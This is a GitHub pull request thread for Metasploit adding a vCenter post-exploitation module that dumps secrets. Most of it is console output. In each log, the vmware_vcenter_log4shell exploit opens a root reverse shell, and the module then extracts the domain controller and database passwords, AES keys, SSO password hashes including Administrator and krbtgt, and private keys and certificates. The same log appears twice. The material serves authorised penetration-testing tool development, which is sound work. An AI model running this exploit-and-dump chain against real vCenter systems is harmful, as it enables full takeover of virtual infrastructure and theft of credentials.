metasploit-framework
metasploit-framework copied to clipboard
rapid7
Add vcenter_secrets_dump post module
This is a rework of #16465 and expands on the work of @npm-cesium137-io but unfortunately they seem to gone missing (mainly due to my rework taking a long time). It moves many of the functions to a library and includes a spec so we can track changes and ensure the code is working.
This PR is part of a series of PRs. After this lands, I'll add in @ErikWynter 's two modules, but want to get this pushed to master before we start expanding so we have a good base of work to go off of.
This module adds a new post module for vcenter . to test it, you'll want to root a vcenter (i've been using my log4j box for this purpose).
Verification
- [ ] Start
msfconsole - [ ] use an exploit to get root on a box, such as
exploit/multi/http/vmware_vcenter_log4shell - [ ]
use vcenter_secrets_dump - [ ]
set session 1 - [ ] run
- [ ] Verify no errors are encountered
- [ ] Documentation looks good
@ErikWynter @npm-cesium137-io can you all test this module? I suspect there are still some bugs (hence why its draft) since my vcenter doesn't have any ESXs connected to control, and there are many ways to configure vcenter other than what I have.
please post (sanitized) output here, I left the docs in their old state until I can finalize everything a bit more
I'm going to go ahead and open this up. While it isn't 100% finished, I don't have SSO setup and am hoping someone will who can test that portion, its the last part and I just need to know what the output is from the cmd_exec command to lib it all up. Other than that move, i think the rest is ready to test.
I don't have SSO setup and am hoping someone will who can test that portion, its the last part and I just need to know what the output is from the cmd_exec command to lib it all up.
Are we blocked on this? I can't guarantee we'll have an SSO setup for testing, so if we're blocked on that, would it make sense to just omit it for now?
Updated to address comments. It's been so long I'm not sure if I was getting this error before, will trace it down this week to see if its in my code or a payload issue
[*] Dumping vmdir schema to LDIF and storing to loot...
[-] Failed to open file: /tmp/.vsphere.local_20220918213126.tmp: core_channel_open: Operation failed: 1
[!] Unable to retrieve ldif contents
[*] Extracting certificates from vSphere platform ...
[+] VMCA_ROOT key: /home/h00die/.msf4/loot/20220918213127_default_192.168.2.203_vmca_090364.key
[+] VMCA_ROOT cert: /home/h00die/.msf4/loot/20220918213128_default_192.168.2.203_vmca_058942.pem
[!] vmwSTSPrivateKey was not found in vmdir, checking for legacy ssoserverSign key PEM files...
[-] Error processing IdP trusted certificate private key
Updated to address comments. It's been so long I'm not sure if I was getting this error before, will trace it down this week to see if its in my code or a payload issue
[*] Dumping vmdir schema to LDIF and storing to loot... [-] Failed to open file: /tmp/.vsphere.local_20220918213126.tmp: core_channel_open: Operation failed: 1 [!] Unable to retrieve ldif contents [*] Extracting certificates from vSphere platform ... [+] VMCA_ROOT key: /home/h00die/.msf4/loot/20220918213127_default_192.168.2.203_vmca_090364.key [+] VMCA_ROOT cert: /home/h00die/.msf4/loot/20220918213128_default_192.168.2.203_vmca_058942.pem [!] vmwSTSPrivateKey was not found in vmdir, checking for legacy ssoserverSign key PEM files... [-] Error processing IdP trusted certificate private key
looks like this was in the previous commit, looking into it still
@h00die thanks for continuing to work on this! Unfortunately I haven't come across a vulnerable instance in quite a while, but next time I do, I'll try to run this one
msf6 exploit(multi/http/vmware_vcenter_log4shell) > run
[*] Started reverse TCP handler on 10.5.135.109:4568
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Using auxiliary/scanner/http/log4shell_scanner as check
[+] 10.5.132.114:443 - Log4Shell found via /websso/SAML2/SSO/vsphere.local?SAMLRequest= (header: X-Forwarded-For) (os: Linux 4.4.228-1.ph1 unknown, architecture: amd64-64) (java: Oracle Corporation_1.8.0_251)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Sleeping 30 seconds for any last LDAP connections
[*] Server stopped.
[+] The target is vulnerable.
[+] Delivering the serialized Java object to execute the payload...
[*] Command shell session 1 opened (10.5.135.109:4568 -> 10.5.132.114:54020) at 2022-10-24 12:11:36 -0500
[*] Server stopped.
id
uid=0(root) gid=0(root) groups=0(root)
^Z
Background session 1? [y/N] y
msf6 exploit(multi/http/vmware_vcenter_log4shell) > use post/linux/gather/vcenter_secrets_dump
msf6 post(linux/gather/vcenter_secrets_dump) > set session 1
session => 1
msf6 post(linux/gather/vcenter_secrets_dump) > set verbose true
verbose => true
msf6 post(linux/gather/vcenter_secrets_dump) > show options
Module options (post/linux/gather/vcenter_secrets_dump):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on
Post action:
Name Description
---- -----------
Dump Dump vCenter Secrets
msf6 post(linux/gather/vcenter_secrets_dump) > run
[*] VMware VirtualCenter 6.7.0 build-17028632
[*] vCenter Appliance (Embedded)
[*] Validating target ...
[*] Enumerating universal vSphere binaries ...
[+] ldapsearch: /opt/likewise/bin/ldapsearch
[*] Appliance IPv4: 10.5.132.114
[*] Appliance Hostname: photon-machine.moose
[*] Appliance OS: VMware Photon Linux 1.0-62c543d
[*] Gathering vSphere SSO domain information ...
[*] vSphere Machine ID: be5822f7-2722-446b-b374-9c48a1923c76
[*] vSphere SSO Domain FQDN: vsphere.local
[*] vSphere SSO Domain DN: dc=vsphere,dc=local
[*] Extracting dcAccountDN and dcAccountPassword via lwregshell on local vCenter ...
[+] vSphere SSO DC DN: cn=photon-machine.moose,ou=Domain Controllers,dc=vsphere,dc=local
[+] vSphere SSO DC PW: lUdBq\\EY;B+c"{e5So-r
[*] Extracting tenant and vpx AES encryption key...
[*] vCenter returned a Base64 AES key: LDQ3U1V/XD0rZmg8OUM/bQ==
[+] vSphere Tenant AES encryption
[+] KEY: ,47SU\=+fh<9C?m
[+] HEX: 2c343753557f5c3d2b66683c39433f6d
[+] vSphere vmware-vpx AES encryption
[+] HEX: 904bc531eeb4e3846c6738213e2ad671aaa8c12f6ab35a75a130a6fd8b992e23
[*] Extracting PostgreSQL database credentials ...
[+] VCDB Name: VCDB
[+] VCDB User: vc
[+] VCDB Pass: *Kk5!=FY3pCn)uB9
[*] Extract ESXi host vpxuser credentials ...
[!] No ESXi hosts attached to this vCenter system
[*] Extracting vSphere SSO domain secrets ...
[*] Dumping vmdir schema to LDIF and storing to loot...
[+] LDIF Dump: /home/tmoose/.msf4/loot/20221024122441_default_10.5.132.114_vmdir_498874.ldif
[*] Processing vmdir LDIF (this may take several minutes) ...
[*] Processing LDIF entries ...
[*] Processing SSO account hashes ...
[+] vSphere SSO User Credential: cn=photon-machine.moose,ou=Domain Controllers,dc=vsphere,dc=local:$dynamic_82$909ac122bb4f53952c2d815f63c784f17f5604bbde1dd9241264614f10d3f8c55fa189e78286607ad124feea8d9655c773d81ec6330e750f8535d7bc3b6caae9$HEX$4055d19b919c6c8a6bc96865a8416827
[!] No active DB -- Credential data will not be saved!
[+] vSphere SSO User Credential: CN=waiter 404763bc-2aaf-432d-bcc1-1134b3426dc7,cn=users,dc=vsphere,dc=local:$dynamic_82$f79b19ebf8adde8717cc637a5657691ec56c2e06d582ba1004bbe4e54bfab0741a623047aaeb9490bb5c8867e2a742a5a39705212d12142357665d35848830c7$HEX$d20b641916b4779432fb6573343e9b6e
[+] vSphere SSO User Credential: cn=krbtgt/VSPHERE.LOCAL,cn=users,dc=VSPHERE,dc=LOCAL:$dynamic_82$e240b2eb552b9f9a7c3f8ebb30a3b68533096ab9addb2b189b2eb3fc1435723ac20cc8998d085679cd6397c93d709d76e1ade2ab58e119932c8104857221609b$HEX$601a57286c99e0846385282f7afd4be2
[+] vSphere SSO User Credential: cn=K/M,cn=users,dc=VSPHERE,dc=LOCAL:$dynamic_82$03094aaabcba803d1c4e2694c24065808bee59f3db0e23e43475b95e4d6ed0068d5de48f7502ef827ed4663609f4397ca89d256659908f4f4ddf6a7d9128e609$HEX$24e4fa79a0b65fbd768e95f29e3c3f93
[+] vSphere SSO User Credential: cn=Administrator,cn=Users,dc=vsphere,dc=local:$dynamic_82$055e73b99895cf7ef6560d556eaae7ce537cefcaa73c72d0d2a4564e08610565614d3ad407c8dd940cc0152c4582f3f53a24d1a9744686edf1966ea89e37379f$HEX$476cec1c760a1eab86bb00fc11da2ebf
[+] vSphere SSO User Credential: cn=vmca/[email protected],cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$44541ee284d439c65840ae08f684fcda6afa5c9f23e2964a933c6ffa540378a55ce162578a9116b2ee675e6b06db788c69c237f267314e6acfa03553df6774eb$HEX$fdd1d5f311ca1909cbd59d62c08318da
[+] vSphere SSO User Credential: cn=ldap/[email protected],cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$81953e69205ce32ff5ae83ee3113849a3ff8773ef437f4dd9152915f414fde037637f95b529866abd0c87ca373963234a747ac46881f29c9a99ac479759a0c4d$HEX$769f7212f651731e667767350c39c90e
[+] vSphere SSO User Credential: cn=DNS/[email protected],cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$58cceb892e40e02473f9be913034f86ed0f2f13d2d43fa2895afd0208a9c4e17d32506ce7cbcd03904cfa411a5e02e51e12a8c661526943f97bc1eefba0bcb14$HEX$4712e9c49dee731aa49dbd3c9f3f454f
[+] vSphere SSO User Credential: cn=host/[email protected],cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$69cb7dd55b1e1e2de1a0881911ad0c0e10f3e7edb545dafcc3fc76d1fb8112c5e749a4346892675bd076976c94076bf6f4fee0cb7beb122d77eea69e2599ad0b$HEX$895786442af879d243b9e72a5e68e8f2
[*] Processing SSO identity sources ...
[*] Found SSO Identity Source Credential:
[+] IDENTITY_STORE_TYPE_VMWARE_DIRECTORY @ ldap://localhost:389:
[+] SSOUSER: [email protected]
[+] SSOPASS: m.pB:fo|\Dj2%CGcUL3[
[+] SSODOMAIN: vsphere.local
[*] Extracting certificates from vSphere platform ...
[*] Extract VMCA_ROOT key ...
[+] VMCA_ROOT key: /home/tmoose/.msf4/loot/20221024122442_default_10.5.132.114_vmca_742773.key
[*] Extract VMCA_ROOT cert ...
[+] VMCA_ROOT cert: /home/tmoose/.msf4/loot/20221024122442_default_10.5.132.114_vmca_566968.pem
[*] Fetching objectclass=vmwSTSTenantCredential via vmdir LDAP ...
[*] Parsing vmwSTSTenantCredential certificates and keys ...
[*] Downloading advertised IDM tenant certificate chain from http://localhost:7080/idm/tenant/ on local vCenter ...
[*] Validated vSphere SSO IdP certificate against vSphere IDM tenant certificate
[+] SSO_STS_IDP key: /home/tmoose/.msf4/loot/20221024122443_default_10.5.132.114_idp_092125.key
[+] SSO_STS_IDP cert: /home/tmoose/.msf4/loot/20221024122443_default_10.5.132.114_idp_845777.pem
[*] Extract MACHINE_SSL_CERT key ...
[+] MACHINE_SSL_CERT Key: /home/tmoose/.msf4/loot/20221024122443_default_10.5.132.114___MACHINE_CERT_346174.key
[*] Extract MACHINE_SSL_CERT certificate ...
[+] MACHINE_SSL_CERT Cert: /home/tmoose/.msf4/loot/20221024122443_default_10.5.132.114___MACHINE_CERT_187599.pem
[*] Extract MACHINE key ...
[+] MACHINE Key: /home/tmoose/.msf4/loot/20221024122444_default_10.5.132.114_machine_089886.key
[*] Extract MACHINE certificate ...
[+] MACHINE Cert: /home/tmoose/.msf4/loot/20221024122444_default_10.5.132.114_machine_123421.pem
[*] Extract VSPHERE-WEBCLIENT key ...
[+] VSPHERE-WEBCLIENT Key: /home/tmoose/.msf4/loot/20221024122444_default_10.5.132.114_vspherewebclien_672781.key
[*] Extract VSPHERE-WEBCLIENT certificate ...
[+] VSPHERE-WEBCLIENT Cert: /home/tmoose/.msf4/loot/20221024122444_default_10.5.132.114_vspherewebclien_063188.pem
[*] Extract VPXD key ...
[+] VPXD Key: /home/tmoose/.msf4/loot/20221024122444_default_10.5.132.114_vpxd_910040.key
[*] Extract VPXD certificate ...
[+] VPXD Cert: /home/tmoose/.msf4/loot/20221024122444_default_10.5.132.114_vpxd_061784.pem
[*] Extract VPXD-EXTENSION key ...
[+] VPXD-EXTENSION Key: /home/tmoose/.msf4/loot/20221024122445_default_10.5.132.114_vpxdextension_701482.key
[*] Extract VPXD-EXTENSION certificate ...
[+] VPXD-EXTENSION Cert: /home/tmoose/.msf4/loot/20221024122445_default_10.5.132.114_vpxdextension_317366.pem
[*] Extract DATA-ENCIPHERMENT key ...
[+] DATA-ENCIPHERMENT Key: /home/tmoose/.msf4/loot/20221024122445_default_10.5.132.114_dataenciphermen_955390.key
[*] Extract DATA-ENCIPHERMENT certificate ...
[+] DATA-ENCIPHERMENT Cert: /home/tmoose/.msf4/loot/20221024122445_default_10.5.132.114_dataenciphermen_886266.pem
[*] Extract SMS key ...
[+] SMS Key: /home/tmoose/.msf4/loot/20221024122446_default_10.5.132.114_sms_self_signed_127498.key
[*] Extract SMS certificate ...
[+] SMS Cert: /home/tmoose/.msf4/loot/20221024122446_default_10.5.132.114_sms_self_signed_611042.pem
[*] Searching for secrets in VM Guest Customization Specification XML ...
[!] No vpx_customization_spec entries evident
[*] Post module execution completed
just checking in on this, before it falls off the to do list
https://github.com/rapid7/metasploit-framework/pull/16871#discussion_r972264964 looks still unresponded/unresolved.
msf6 exploit(multi/http/vmware_vcenter_log4shell) > run
[*] Started reverse TCP handler on 10.5.135.109:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Using auxiliary/scanner/http/log4shell_scanner as check
[+] 10.5.132.114:443 - Log4Shell found via /websso/SAML2/SSO/vsphere.local?SAMLRequest= (header: X-Forwarded-For) (os: Linux 4.4.228-1.ph1 unknown, architecture: amd64-64) (java: Oracle Corporation_1.8.0_251)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Sleeping 30 seconds for any last LDAP connections
[*] Server stopped.
[+] The target is vulnerable.
[+] Delivering the serialized Java object to execute the payload...
[*] Command shell session 1 opened (10.5.135.109:4444 -> 10.5.132.114:57164) at 2022-10-27 10:53:23 -0500
[*] Server stopped.
id
uid=0(root) gid=0(root) groups=0(root)
^Z
Background session 1? [y/N] y
msf6 exploit(multi/http/vmware_vcenter_log4shell) > use post/linux/gather/vcenter_secrets_dump
msf6 post(linux/gather/vcenter_secrets_dump) > show options
Module options (post/linux/gather/vcenter_secrets_dump):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
Post action:
Name Description
---- -----------
Dump Dump vCenter Secrets
msf6 post(linux/gather/vcenter_secrets_dump) > set session 1
session => 1
msf6 post(linux/gather/vcenter_secrets_dump) > set verbose true
verbose => true
msf6 post(linux/gather/vcenter_secrets_dump) > run
[*] VMware VirtualCenter 6.7.0 build-17028632
[*] vCenter Appliance (Embedded)
[*] Validating target ...
[*] Enumerating universal vSphere binaries ...
[+] ldapsearch: /opt/likewise/bin/ldapsearch
[*] Appliance IPv4: 10.5.132.114
[*] Appliance Hostname: photon-machine.moose
[*] Appliance OS: VMware Photon Linux 1.0-62c543d
[*] Gathering vSphere SSO domain information ...
[*] vSphere Machine ID: be5822f7-2722-446b-b374-9c48a1923c76
[*] vSphere SSO Domain FQDN: vsphere.local
[*] vSphere SSO Domain DN: dc=vsphere,dc=local
[*] Extracting dcAccountDN and dcAccountPassword via lwregshell on local vCenter ...
[+] vSphere SSO DC DN: cn=photon-machine.moose,ou=Domain Controllers,dc=vsphere,dc=local
[+] vSphere SSO DC PW: lUdBq\\EY;B+c"{e5So-r
[*] Extracting tenant and vpx AES encryption key...
[*] vCenter returned a Base64 AES key: LDQ3U1V/XD0rZmg8OUM/bQ==
[+] vSphere Tenant AES encryption
[+] KEY: ,47SU\=+fh<9C?m
[+] HEX: 2c343753557f5c3d2b66683c39433f6d
[+] vSphere vmware-vpx AES encryption
[+] HEX: 904bc531eeb4e3846c6738213e2ad671aaa8c12f6ab35a75a130a6fd8b992e23
[*] Extracting PostgreSQL database credentials ...
[+] VCDB Name: VCDB
[+] VCDB User: vc
[+] VCDB Pass: *Kk5!=FY3pCn)uB9
[*] Extract ESXi host vpxuser credentials ...
[!] No ESXi hosts attached to this vCenter system
[*] Extracting vSphere SSO domain secrets ...
[*] Dumping vmdir schema to LDIF and storing to loot...
[+] LDIF Dump: /home/tmoose/.msf4/loot/20221027110049_default_10.5.132.114_vmdir_949273.ldif
[*] Processing vmdir LDIF (this may take several minutes) ...
[*] Processing LDIF entries ...
[*] Processing SSO account hashes ...
[+] vSphere SSO User Credential: cn=photon-machine.moose,ou=Domain Controllers,dc=vsphere,dc=local:$dynamic_82$909ac122bb4f53952c2d815f63c784f17f5604bbde1dd9241264614f10d3f8c55fa189e78286607ad124feea8d9655c773d81ec6330e750f8535d7bc3b6caae9$HEX$4055d19b919c6c8a6bc96865a8416827
[!] No active DB -- Credential data will not be saved!
[+] vSphere SSO User Credential: CN=waiter 404763bc-2aaf-432d-bcc1-1134b3426dc7,cn=users,dc=vsphere,dc=local:$dynamic_82$f79b19ebf8adde8717cc637a5657691ec56c2e06d582ba1004bbe4e54bfab0741a623047aaeb9490bb5c8867e2a742a5a39705212d12142357665d35848830c7$HEX$d20b641916b4779432fb6573343e9b6e
[+] vSphere SSO User Credential: cn=krbtgt/VSPHERE.LOCAL,cn=users,dc=VSPHERE,dc=LOCAL:$dynamic_82$e240b2eb552b9f9a7c3f8ebb30a3b68533096ab9addb2b189b2eb3fc1435723ac20cc8998d085679cd6397c93d709d76e1ade2ab58e119932c8104857221609b$HEX$601a57286c99e0846385282f7afd4be2
[+] vSphere SSO User Credential: cn=K/M,cn=users,dc=VSPHERE,dc=LOCAL:$dynamic_82$03094aaabcba803d1c4e2694c24065808bee59f3db0e23e43475b95e4d6ed0068d5de48f7502ef827ed4663609f4397ca89d256659908f4f4ddf6a7d9128e609$HEX$24e4fa79a0b65fbd768e95f29e3c3f93
[+] vSphere SSO User Credential: cn=Administrator,cn=Users,dc=vsphere,dc=local:$dynamic_82$055e73b99895cf7ef6560d556eaae7ce537cefcaa73c72d0d2a4564e08610565614d3ad407c8dd940cc0152c4582f3f53a24d1a9744686edf1966ea89e37379f$HEX$476cec1c760a1eab86bb00fc11da2ebf
[+] vSphere SSO User Credential: cn=vmca/[email protected],cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$44541ee284d439c65840ae08f684fcda6afa5c9f23e2964a933c6ffa540378a55ce162578a9116b2ee675e6b06db788c69c237f267314e6acfa03553df6774eb$HEX$fdd1d5f311ca1909cbd59d62c08318da
[+] vSphere SSO User Credential: cn=ldap/[email protected],cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$81953e69205ce32ff5ae83ee3113849a3ff8773ef437f4dd9152915f414fde037637f95b529866abd0c87ca373963234a747ac46881f29c9a99ac479759a0c4d$HEX$769f7212f651731e667767350c39c90e
[+] vSphere SSO User Credential: cn=DNS/[email protected],cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$58cceb892e40e02473f9be913034f86ed0f2f13d2d43fa2895afd0208a9c4e17d32506ce7cbcd03904cfa411a5e02e51e12a8c661526943f97bc1eefba0bcb14$HEX$4712e9c49dee731aa49dbd3c9f3f454f
[+] vSphere SSO User Credential: cn=host/[email protected],cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$69cb7dd55b1e1e2de1a0881911ad0c0e10f3e7edb545dafcc3fc76d1fb8112c5e749a4346892675bd076976c94076bf6f4fee0cb7beb122d77eea69e2599ad0b$HEX$895786442af879d243b9e72a5e68e8f2
[*] Processing SSO identity sources ...
[*] Found SSO Identity Source Credential:
[+] IDENTITY_STORE_TYPE_VMWARE_DIRECTORY @ ldap://localhost:389:
[+] SSOUSER: [email protected]
[+] SSOPASS: m.pB:fo|\Dj2%CGcUL3[
[+] SSODOMAIN: vsphere.local
[*] Extracting certificates from vSphere platform ...
[*] Extract VMCA_ROOT key ...
[+] VMCA_ROOT key: /home/tmoose/.msf4/loot/20221027110050_default_10.5.132.114_vmca_128689.key
[*] Extract VMCA_ROOT cert ...
[+] VMCA_ROOT cert: /home/tmoose/.msf4/loot/20221027110050_default_10.5.132.114_vmca_979914.pem
[*] Fetching objectclass=vmwSTSTenantCredential via vmdir LDAP ...
[*] Parsing vmwSTSTenantCredential certificates and keys ...
[*] Downloading advertised IDM tenant certificate chain from http://localhost:7080/idm/tenant/ on local vCenter ...
[*] Validated vSphere SSO IdP certificate against vSphere IDM tenant certificate
[+] SSO_STS_IDP key: /home/tmoose/.msf4/loot/20221027110050_default_10.5.132.114_idp_766703.key
[+] SSO_STS_IDP cert: /home/tmoose/.msf4/loot/20221027110050_default_10.5.132.114_idp_956011.pem
[*] Extract MACHINE_SSL_CERT key ...
[+] MACHINE_SSL_CERT Key: /home/tmoose/.msf4/loot/20221027110051_default_10.5.132.114___MACHINE_CERT_931284.key
[*] Extract MACHINE_SSL_CERT certificate ...
[+] MACHINE_SSL_CERT Cert: /home/tmoose/.msf4/loot/20221027110051_default_10.5.132.114___MACHINE_CERT_492725.pem
[*] Extract MACHINE key ...
[+] MACHINE Key: /home/tmoose/.msf4/loot/20221027110052_default_10.5.132.114_machine_948197.key
[*] Extract MACHINE certificate ...
[+] MACHINE Cert: /home/tmoose/.msf4/loot/20221027110052_default_10.5.132.114_machine_946055.pem
[*] Extract VSPHERE-WEBCLIENT key ...
[+] VSPHERE-WEBCLIENT Key: /home/tmoose/.msf4/loot/20221027110052_default_10.5.132.114_vspherewebclien_601663.key
[*] Extract VSPHERE-WEBCLIENT certificate ...
[+] VSPHERE-WEBCLIENT Cert: /home/tmoose/.msf4/loot/20221027110052_default_10.5.132.114_vspherewebclien_043993.pem
[*] Extract VPXD key ...
[+] VPXD Key: /home/tmoose/.msf4/loot/20221027110052_default_10.5.132.114_vpxd_210288.key
[*] Extract VPXD certificate ...
[+] VPXD Cert: /home/tmoose/.msf4/loot/20221027110052_default_10.5.132.114_vpxd_029440.pem
[*] Extract VPXD-EXTENSION key ...
[+] VPXD-EXTENSION Key: /home/tmoose/.msf4/loot/20221027110052_default_10.5.132.114_vpxdextension_414011.key
[*] Extract VPXD-EXTENSION certificate ...
[+] VPXD-EXTENSION Cert: /home/tmoose/.msf4/loot/20221027110052_default_10.5.132.114_vpxdextension_483742.pem
[*] Extract DATA-ENCIPHERMENT key ...
[+] DATA-ENCIPHERMENT Key: /home/tmoose/.msf4/loot/20221027110053_default_10.5.132.114_dataenciphermen_605774.key
[*] Extract DATA-ENCIPHERMENT certificate ...
[+] DATA-ENCIPHERMENT Cert: /home/tmoose/.msf4/loot/20221027110053_default_10.5.132.114_dataenciphermen_742464.pem
[*] Extract SMS key ...
[+] SMS Key: /home/tmoose/.msf4/loot/20221027110053_default_10.5.132.114_sms_self_signed_644974.key
[*] Extract SMS certificate ...
[+] SMS Cert: /home/tmoose/.msf4/loot/20221027110053_default_10.5.132.114_sms_self_signed_021024.pem
[*] Searching for secrets in VM Guest Customization Specification XML ...
[!] No vpx_customization_spec entries evident
[*] Post module execution completed
Release Notes
Add post/linux/gather module to dump vCenter vmdir dcAccountPassword and platform certificates.
@npm-cesium137-io just wanted to make sure you saw this landed to framework. Sorry it took so long! @ErikWynter I'll start working on the database portion soon!
@h00die congrats! feel free to ping me if you have any questions about the db stuff or run into anything weird
@HynekPetrak these are really good issues/things to bring up. Can you start an issue and tag me on it so they don't get lost on this already merged module? I'll either add the updates to #17214 or PR them up if that one lands before i can get to these.
@npm-cesium137-io just wanted to make sure you saw this landed to framework. Sorry it took so long! @ErikWynter I'll start working on the database portion soon!
Hi, I'm amazed that you were able to whip that, uhm, comprehensive pile of code I plopped here into something workable, can't wait to try it out! P.S. trying to deal with all the shell escaping for bind / DB passwords shaved years off my life, too, IKTF.
